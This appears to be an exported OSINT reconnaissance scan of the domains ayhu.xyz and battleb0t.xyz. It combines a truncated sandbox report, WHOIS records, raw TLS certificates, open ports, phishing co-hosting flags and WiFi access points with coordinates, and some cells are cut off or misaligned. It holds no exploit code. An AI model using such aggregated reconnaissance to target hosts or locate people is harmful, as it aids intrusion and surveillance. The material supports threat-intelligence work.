u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"testng.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"\n "testng.org"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "js_2_.js")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"book-cover_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 240x240 components 3" and extension "jpg"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{5871dd0f-ed6d-11ed-8b85-0800279fc51b}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df34ee8deb327261c2.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df34ee8deb327261c2.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{5871dd0f-ed6d-11ed-8b85-0800279fc51b}.dat"\n "iexplore.exe" reads file "c:\\windows\\fonts\\staticcache.dat"\n "iexplore.exe" reads file "c:\\users\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\favorites\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\desktop\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfa4eee6f450613449.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "js_2_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "CabDA7E.tmp" has type "data"- Location: [%TEMP%\\CabDA7E.tmp]- [targetUID: 00000000-00003848]\n "analytics_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "prettify_1_.js" has type "HTML document ASCII text"- [targetUID: N/A]\n "urchin_1_.js" has type "C source ASCII text"- [targetUID: N/A]\n "shCore_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002992]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DFA4EEE6F450613449.TMP" has type "data"- Location: [%TEMP%\\~DFA4EEE6F450613449.TMP]- [targetUID: 00000000-00002992]\n "~DF34EE8DEB327261C2.TMP" has type "data"- Location: [%TEMP%\\~DF34EE8DEB327261C2.TMP]- [targetUID: 00000000-00002992]\n "~DF06E476F392A812D4.TMP" has type "data"- Location: [%TEMP%\\~DF06E476F392A812D4.TMP]- [targetUID: 00000000-00002992]\n "~DF83692D717FE481FF.TMP" has type "data"- Location: [%TEMP%\\~DF83692D717FE481FF.TMP]- [targetUID: 00000000-00002992]\n "book-cover_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 240x240 components 3"- [targetUID: N/A]\n "doc_1_.htm" has type "Perl5 module source ASCII text with very long lines"- [targetUID: N/A]\n "shCore_1_.css" has type "ASCII text"- [targetUID: N/A]\n "RecoveryStore._5871DD0F-ED6D-11ED-8B85-0800279FC51B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_62BB807B-ED6D-11ED-8B85-0800279FC51B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_5871DD11-ED6D-11ED-8B85-0800279FC51B_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "shThemeCedric_1_.css" has type "ASCII text"- [targetUID: N/A]\n "shBrushBash_1_.js" has type "ASCII text"- [targetUID: N/A]\n "beust_1_.css" has type "ASCII text"- [targetUID: N/A]\n "shBrushJava_1_.js" has type "ASCII text"- [targetUID: N/A]\n "shBrushXml_1_.js" has type "exported SGML document ASCII text"- [targetUID: N/A]\n "testng_1_.css" has type "ASCII text"- [targetUID: N/A]\n "banner_1_.js" has type "HTML document ASCII text"- [targetUID: N/A]\n "shBrushPlain_1_.js" has type "ASCII text"- [targetUID: N/A]\n "2164NNV6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2164NNV6.txt]- [targetUID: 00000000-00003848]\n "NY1L6JFD.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NY1L6JFD.txt]- [targetUID: 00000000-00003848]\n "K0V0Z1ZR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\K0V0Z1ZR.txt]- [targetUID: 00000000-00002992]\n "3CHE3NSB.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3CHE3NSB.txt]- [targetUID: 00000000-00002992]\n "50L3A0E6.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\50L3A0E6.txt]- [targetUID: 00000000-00003848]\n "MTWA1YU1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\MTWA1YU1.txt]- [targetUID: 00000000-00003848]\n "0AU39AQO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0AU39AQO.txt]- [targetUID: 00000000-00002992]\n "2RGLQPTP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2RGLQPTP.txt]- [targetUID: 00000000-00003848]\n "8260X7M8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8260X7M8.txt]- [targetUID: 00000000-00002992]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003848]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "GBE2J635.txt" has type "ASCII text"- Location: [%A | 185.199.108.153 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 2 | 0 | None | (c) CentralNic Ltd | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 02:44:44 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 3 | 0 | None | HTTP/3 | vscode.battleb0t.xyz |
| 2023-05-12 03:36:14 | Blacklisted IP on Same Subnet | Yes | DroneBL | 0 | 0 | 4 | 0 | None | dronebl.org - HTTP Proxy (45.131.109.106) | 45.131.109.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Heisenberg (Net ID: 00:0C:F6:D0:27:08) | 50.8897, 6.0563 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:8880 | 172.67.135.9 |
| 2023-05-12 02:55:22 | Raw Data from RIRs | No | Google | 0 | 0 | 1 | 0 | None | {'webSearchUrl': u'https://www.google.com/search?q=site:ayhu.xyz&aq=t&oe=utf-8&client=firefox-a&ie=utf-8&rls=org.mozilla%3Aen-US%3Aofficial', 'urls': ['https://ayhu.xyz/', 'https://ayhu.xyz/lol.html']} | ayhu.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pfa (Net ID: 00:02:6F:C4:70:30) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:09:51 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.93 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | PACSStemp (Net ID: 00:0F:66:D6:82:2B) | 32.8608, -79.9746 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Mistrzowie (Category: images)
https://mistrzowie.org/user/login | login |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | InkBunny (Category: XXXPORNXXX)
https://inkbunny.net/login | login |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-range.github.io]
https://www.openphish.com/feed.txt | 0-range.github.io |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01010101coder.github.io]
https://www.openphish.com/feed.txt | 01010101coder.github.io |
| 2023-05-12 03:23:44 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.17:443 | 188.114.96.0/24 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:80 | 104.21.71.14 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | XTN-25BD34 (Net ID: 70:F8:E7:25:BD:34) | 37.751, -97.822 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Guest (Net ID: 00:01:21:30:AF:A1) | 41.8781, -87.6298 |
| 2023-05-12 03:23:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.6:443 | 188.114.96.0/24 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SpaceStation (Net ID: 00:02:2D:01:CF:F8) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx Guest (Net ID: 00:01:21:26:42:60) | 41.8781, -87.6298 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet8682 (Net ID: 00:01:36:5B:86:80) | 37.780462,-122.390564 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:74:c7:69:09:be:bf:85:53:83:95:0e:84:5e:23:6b:8f:95
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 17:04:53 2023 GMT
Not After : Jun 25 17:04:52 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c0:92:2b:06:a8:76:be:87:ad:a1:7a:9e:5a:24:
59:36:93:77:df:2f:5f:ec:5d:f8:39:5c:9e:e9:bb:
24:38:91:de:54:5b:7a:21:bd:81:66:b9:f4:29:4c:
2b:fa:57:13:7e:92:b4:15:86:67:29:e9:3d:cd:52:
95:9b:57:3a:5d:e6:e9:45:19:f1:e0:94:39:75:06:
2b:76:17:5a:3c:dc:eb:34:5d:2b:11:01:60:df:20:
e3:b5:60:cd:32:82:ad:56:26:62:d5:06:6e:b6:fa:
a5:d9:a5:4d:79:33:21:15:51:a2:c0:48:15:37:c6:
91:2f:b2:2e:7d:a0:75:7f:50:14:78:92:5d:14:20:
37:35:75:05:53:06:c4:4c:79:be:57:44:4e:7f:9a:
50:6f:84:ce:99:6c:50:c4:25:b5:3b:28:ef:3d:1e:
0d:f1:c2:fb:f7:a2:98:40:97:4e:a6:29:13:ba:fe:
a3:fd:ca:b9:fd:ab:de:51:93:45:07:f4:be:76:56:
10:d6:f8:44:07:0f:8a:0a:1d:0b:2a:3e:ea:d3:77:
c7:f9:17:20:d7:71:23:2b:a0:8f:f4:4a:f3:e4:d4:
5a:5c:2d:ce:df:b4:a0:a0:ac:d7:ab:d8:92:f0:4a:
4c:07:6e:72:26:57:04:a7:82:b9:f3:2d:17:4e:50:
36:d2:94:d7:69:b9:6a:7a:3a:20:4d:5d:1e:75:6c:
84:96:b6:c4:70:f4:80:b9:d6:06:45:7a:52:b8:0e:
0e:2d:fd:2c:dc:22:9b:06:83:b7:ce:89:98:50:8a:
98:25:5c:fe:f2:ac:51:29:2f:08:c4:ff:27:4b:06:
5c:49:dd:d3:39:da:b3:60:fe:da:c7:a0:9e:e7:45:
85:7c:70:41:16:a9:f0:27:f6:98:d1:7c:9f:af:81:
f4:37:0b:12:28:d5:35:6a:e6:e2:66:3b:e1:11:5b:
6a:d4:8d:47:d6:44:64:d5:a9:fc:83:71:f4:46:8c:
69:8f:3e:2f:32:4d:8a:48:3b:ac:ac:88:a4:94:ea:
b5:b5:92:f4:63:d9:95:76:ef:6d:8e:2f:15:8a:59:
65:d3:00:6a:ca:d7:56:11:cf:5f:a7:d4:3d:48:6a:
5d:dd:87:ce:8c:d0:6e:15:cf:fb:5f:c0:02:33:50:
4e:36:37:09:f4:b7:06:18:07:a3:00:b5:58:4a:d2:
bc:0d:0b:5d:96:5b:4e:aa:75:b7:e9:a2:ce:90:ad:
d7:25:96:7f:66:7d:4e:03:23:c1:16:bc:0c:09:9d:
d4:bf:8c:7c:19:2d:8b:39:0c:89:5a:15:97:34:34:
1c:7b:5d:34:19:a2:d0:cb:f4:5c:b0:48:d7:c9:6c:
5d:09:b3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1F:80:B0:A7:B9:49:16:0F:27:7B:7C:B9:F5:38:B5:3D:C9:3C:2F:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 27 18:04:53.353 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:C2:49:4E:83:B3:46:DC:0B:F2:4C:E0:
2C:BD:3A:21:A9:D3:87:F4:AC:B5:4F:45:81:1D:09:75:
FB:9B:D3:9E:A5:02:20:54:1A:EC:0B:6C:62:AB:8A:0B:
14:2D:42:2F:00:E8:AD:FF:98:7D:A9:48:C3:5C:9D:C9:
A1:63:83:E1:17:D2:4C
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 27 18:04:53.360 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:8C:E5:2C:49:4A:30:97:4C:B4:E6:F3:
86:6A:09:B6:EF:84:21:66:BD:9C:17:9A:88:7C:B9:2A:
4D:1D:CC:99:A2:02:20:13:E4:A1:38:F5:80:6B:55:F9:
DB:4D:54:23:A0:D3:2F:61:E4:B8:03:26:A2:87:C1:4D:
B4:9F:8A:D7:F3:2F:04
Signature Algorithm: sha256WithRSAEncryption
3d:8b:b7:2f:1c:19:9b:ce:8a:9f:49:6d:8e:1c:b1:06:ce:80:
4b:f8:df:50:39:97:3e:fb:8f:2c:ca:50:c1:5c:f8:46:84:02:
f2:57:a0:5c:d2:47:ea:75:b7:5b:8e:d7:bb:b6:ac:23:17:33:
df:77:0a:d0:66:44:16:5a:cd:a4:73:04:82:9c:6e:c5:c2:96:
07:18:e4:ea:f3:48:89:72:cc:2c:e6:89:4a:c1:18:8b:b6:a9:
9e:48:30:26:9c:5a:b4:6d:2c:74:dd:50:cc:be:12:4c:8d:38:
29:5e:de:cf:04:54:ae:14:ed:ec:f9:b8:a0:90:94:ff:e1:0c:
9e:34:2b:1c:68:fd:56:79:13:27:78:22:6f:18:f3:9e:26:b0:
3c:46:ba:7f:dd:d6:fc:c7:27:bd:b5:77:38:03:ba:7b:08:e5:
f1:08:df:bb:f5:ea:f4:e1:c8:be:e6:b7:32:bc:2d:9d:1a:68:
d8:d8:3b:7d:a5:0b:bf:d3:08:d9:73:26:67:23:22:51:a7:9a:
35:1e:3d:5b:8d:37:8d:5a:13:a6:11:a6:6e:3f:57:92:c4:df:
b9:a6:2d:3e:a3:ac:33:74:bf:a3:4d:bc:55:ad:8d:cf:76:66:
f9:f9:8f:df:06:4b:e6:21:7f:06:3d:9b:6e:9c:3f:93:fd:2b:
41:f7:2c:66
| battleb0t.xyz |
| 2023-05-12 02:56:55 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | files.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b9:dc:49:67:68:c5:fe:31:cf:92:a4:a3:f2:91:5a:dc:15
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 19:07:11 2023 GMT
Not After : Apr 2 19:07:10 2023 GMT
Subject: CN=files.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:e4:bb:72:24:9a:3b:f5:c0:b6:00:b2:9e:75:64:
a2:c5:05:47:75:ee:45:0a:c4:64:a2:83:f0:3f:73:
63:b5:70:6c:7f:e6:38:41:f0:ce:48:1b:e9:cb:50:
e5:db:9b:1e:52:33:00:08:50:9b:48:a3:21:b1:72:
aa:97:ba:07:58:22:50:7b:e0:2e:66:ce:83:70:77:
e2:36:f5:0e:13:40:a0:5f:8e:ab:d5:28:a5:4a:11:
32:bf:f0:01:46:1e:7f:2c:f4:2c:07:22:93:45:a7:
52:4d:66:5a:2e:a0:5e:1d:49:67:6d:93:3c:d4:e7:
67:ac:0d:eb:84:c4:ad:1c:c6:3a:c8:a3:8e:b1:df:
54:8a:52:1f:ab:aa:01:49:57:78:fa:b6:5c:77:ae:
0a:d5:12:86:cb:ea:c3:13:b3:1e:aa:59:f3:df:50:
ef:11:40:b8:bb:45:d3:4e:d6:8e:bd:f2:33:ae:52:
06:ca:88:01:72:31:4f:46:00:bf:98:93:9a:2f:f8:
47:9a:87:b9:a0:cb:d1:a8:89:43:66:4d:f6:54:8d:
cf:4c:31:d7:d0:0d:e1:33:7b:c6:0e:1d:4a:3f:9a:
c4:dd:c7:68:08:e6:6f:b9:26:6c:49:f2:5f:ad:59:
da:74:03:6e:20:eb:9a:d2:3d:fb:bc:79:34:c6:43:
38:6b:71:f9:76:22:a0:ca:93:2e:c8:20:b0:a5:40:
b2:06:05:e9:aa:de:b1:b0:40:d3:fa:2b:db:3c:b4:
82:d4:58:96:b7:bc:70:be:ac:1c:cb:fc:f4:c1:71:
31:c2:05:84:ce:b2:c9:8b:1e:36:fd:72:15:79:33:
62:66:31:a9:1f:5f:76:ce:5e:82:a3:20:7b:a6:f9:
68:6f:ff:65:d5:4b:45:ed:7b:6b:c9:7e:38:35:b0:
ed:10:1d:cb:42:25:ea:6d:e6:42:50:4c:82:d7:21:
2e:ac:aa:6c:ee:6b:f7:e1:58:64:07:26:55:c1:2f:
e6:5e:f4:d7:f0:f0:f1:80:c4:a5:9f:c7:96:10:6f:
58:39:48:6a:55:ca:52:01:6a:3b:90:48:bc:27:e3:
bb:2e:83:ea:d3:dc:20:53:21:0d:af:34:82:fc:9f:
4c:d4:4a:b7:14:07:01:bb:2c:76:8e:22:ed:cd:33:
84:b4:42:01:5f:9f:c6:60:56:3d:e0:bb:bf:10:3f:
42:ca:65:31:ce:e9:5e:a4:e2:24:f7:ab:0e:d3:ce:
0e:6d:01:e6:42:c0:05:7f:8e:8b:85:68:57:f5:6c:
ca:7f:14:f3:74:ac:f1:ad:74:c5:8e:20:02:20:df:
19:4d:31:07:4a:75:45:cf:f0:a5:0c:ad:70:b3:f4:
12:1c:8b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CF:FE:0F:FB:EC:E3:E9:7B:CF:AB:EA:49:61:6D:B0:C0:A0:EB:11:BC
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:files.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Jan 2 20:07:12.002 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:A6:85:F1:8A:49:83:21:33:60:55:2D:
99:FB:CF:EE:44:65:69:64:79:C2:61:04:D1:E4:30:AC:
C7:73:4A:13:C5:02:21:00:AC:83:C1:FC:AB:D2:CB:09:
E8:3B:57:0B:C4:10:3C:51:28:96:2A:AD:6A:76:88:D3:
6A:BA:99:2E:34:BF:39:86
Signed Certificate Timestamp:
Version : v1 (0x0)
